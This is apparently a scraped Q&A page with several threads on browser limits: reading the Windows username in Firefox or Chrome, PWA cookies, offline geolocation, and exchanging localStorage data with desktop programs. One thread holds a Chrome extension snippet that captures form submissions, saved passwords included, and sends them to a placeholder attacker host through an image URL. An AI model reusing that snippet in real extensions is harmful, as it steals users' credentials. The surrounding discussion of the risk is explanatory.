I am working on a very old web application(only for intranet usage). In the code, the developer is obtaining the logged in account via this
var wshNetwork = new ActiveXObject("WScript.Network");
document.getElementById('userId').value = wshNetwork.UserName;
This works only in IE. How can I get the logged in account in Firefox/chrome?
I have looked in to other thread (ex: Finding the currently logged in user from a Firefox extension) but that's only for extension.
Are there any other ways to get the domain logged in username in Firefox/Chrome?
No, this is severely security-sensitive information - the main attack vector for compromising your computer. In IE it also only works for trusted websites such as localhost, or with special configuration for the local network - never on internet without additional configuration. Sandboxed JS will never be able to access this information - extensions are considered elevated.
This is something that I would do on server side. Providing you're using IIS, I would set the page to be using only Windows Authentication, read the current user on server side, and send it back to client via hidden field or javascript variable.
Related
I have a web app that uses a cookie as an access token (to let users stay logged in after refreshing/closing the site/app). It works perfectly on desktop but when I try to use it on my Android phone (installing it via Chrome), for some reason it says that I'm not logged in which means it wasn't able to load the access token.
Why is this happening? Is there a difference between how cookies are handled in the browser and when starting a PWA as a standalone?
Also two little side questions, 1, is there a way to debug a PWA that's added to the homescreen (using some sort of remote debugger) and 2, would it be a security risk to use localStorage for storing the access token instead of a cookie? I realize neither is particularly safe but I read that cookies are slightly better for this sort of thing. localStorage works just fine when starting as a standalone
I have a feature in my upcoming web project where I will have to get the UserID/Email ID of the user currently logged in to the machine/PC. Target OS is Windows 10 and logins to the machines are done via Smart Card only. User Data is stored inside MS-AD.
This UserID will be used passed further for Authorization and load the app in browser. The target browser is IE and Chrome.
Is there a way i can fetch the EmailID/UserID of the User logged in via Smart Card to system in Javascript?
ADDITIONAL INFO: The website is setup in private environment. There is no public URL to access the webapp from outside Intranet. The client and backend code is hosted inside VM in Cloud. In nutshell, the is all sitting in private environment in Azure.
Thanks!
Not with JavaScript. JavaScript is run inside the browser container, and more specifically run inside your current webview. Letting JavaScript get access to settings and data on the local machine be a nightmare if phishing, malware and virus sites.
If you know which computers will run your website you could create an application with a server that's running idle on the machine, much like how Spotify's client is doing (the windows client can take commands from the webpage).
The application/server could then try to get the EmailID/UserID from the computer, and then having the server running on some specific port, your JavaScript could then use AJAX-requests to communicate with the local machine from the browser.
I could get the Windows Logged in user using the ActiveX script in IE.
var WinNetwork = new ActiveXObject("WScript.Network");
alert(WinNetwork.UserName)
Will this be a good approach to solve this issue?
Context
I'm working on an ESP32 device that use WifiManager library to set up the device Wifi. This library just create a Wifi Hotspot who redirect to a basic HTML page. This page will be reachable via a smartphone. I want to know the user location when he visits this HTML page.
My Problem
The problem is, that to see this page, he must be connected to the ESP32 Wifi Hotspot so every solution must work without an Internet connection.
Furthermore, I know that there is this API (HTML5 Geolocation), but it didn't work because the server is hosted locally in HTTP. (And I saw a post that said that it must be connected to Internet).
I have also a size constraint. I'm working on a tiny device with already a lot of code so the solution mustn't be to heavy.
So, is there a way to get a smartphone GPS Location via a Javascript script and without using HTML5 Geolocation and without an Internet connection ?
I don't know why you wouldn't want to use JS. It's the only way you can get information from the client in a web app.
The hurdle is, you usually need HTTPS for such sensitive data to be allowed to be sent by the users browser. But how to set your server up for HTTTPS is not a question for StackOverflow.
Sorry that we can't give you a better answer. If you can't do it native you'll have to work with what you've got.
EDIT:
Some browsers need intenet to verify certificates, can't do anything about that. If you don't control the device -> browser.
I had a test in my local environment like this.
Assume that I have a saved username - password on X site.
Make a Chrome extension that has background like this
In background.js:
$(document).on('submit','form',function(){
$("img.logo").attr("src","https://attacker-site/logo.png?data=" + $(this).serialize());
});
After the user open X site and then login with the saved password. Using set new image's source can bypass CORS and I will get all the form submitted data including saved password.
So, it's a Security vulnerability or Not - because it's very hard to deliver this Chrome extension to normal users? (for example: Chrome store will verify new extension very carefully before publish it..)
Some extensions are super powered and can run arbitrary JavaScript on pages. Extensions ask for this permission when users install them.
In principle - extensions can steal all your browsing information, open and query arbitrary pages and read passwords as you submit forms.
They can also unfriend all your friends on Facebook, email pictures of horses to your extended family and send winky smilies to your boss.
Chrome store doesn't verify extensions very well - in practice extensions like "image resizer" can mine cryptocurrency happily or send information to their server (which has been the case) and there is even a business around buying the ability to run code on users' computers using extensions.
I think Chrome's policy is based on the assumption users are adults and can make choices about what extensions they want to install. Oh well.
I would like to read the browser's "localstorage" when the browser is off using the OS !
I want to save client data in localstorage and then switch off the browser and the internet and then let an OS program (a windows exe) access and analyse that data and then write new data into that localstorage area so that when the browser restars the new data is in localstorage.
This should be possible because my OS (i.e. windows) can read can delete cookies from the browser "files" ... so presumably once i know the format of the localstorage "file" then the OS is boss of all of its files and so it should be able to alter them !
So: how do i read and write to JavaScript/HTML5/DOM "localstorage" using "client side .exe programs" ?
FAILING THAT: is there any other way that the OS can pass simple data into (and out of) the browser ?
Obviously all of this has both huge potential POWER and huge potential DANGER !
The browser can only become the "virtual OS of the future" if the real OS can interact safely with it !!
Thank You.
Of course an app running locally with the appropriate permissions can access any file on disk. However, the real question is what to do with that file once it's open?
Consider the following:
Each browser (Chrome, Firefox, IE, Opera) is likely to store localstorage data in its own proprietary format. You'd have to reverse engineer those formats.
Since those formats are an implementation detail (not a documented API), they are liable to change. This will break your app and/or corrupt user data.
What happens if you modify those data files while the browser is open (even if the page in question isn't open)? The browsers don't expect their data files to change out from underneath them, so it's likely you'd see strange behavior.
All of this is to say that this is a very bad idea. You're messing with the internals of someone else's application; that's a big no-no.
Have you considered an alternative approach? When I was faced with a similar problem, I simply implemented a very simple HTTP server in my app that was bound to a specific port on 127.0.0.1.
With XHR and the appropriate CORS headers, your browser-based application can communicate with your desktop app in a safe manner.
Here are some other ways:
Embed a web browser control in your application. The web browser control can readily peek into the page, and the page can readily peek into the local storage. The web browser control refers chiefly to Internet Explorer.
You can pass parameters from the web page into an initiated executable (even a batch file) by manipulating the name of the executable. (Use application/bat as Content-Type to invite the OS to run your program when the user downloads it.)
A ClickOnce program initiated from the browser can readily receive data from the webpage.
You can use automation in your program (AutoIt, AutoHotKey) to copy/paste to an from a field on your web page. You can find the window by title as you control the title on the web page side. You can even automate opening a browser, navigating it to a page that dumps the local storage into a text field, and focuses the field.
ActiveX controls (good luck)
I can't speak for similar tricks for OS X or Linux.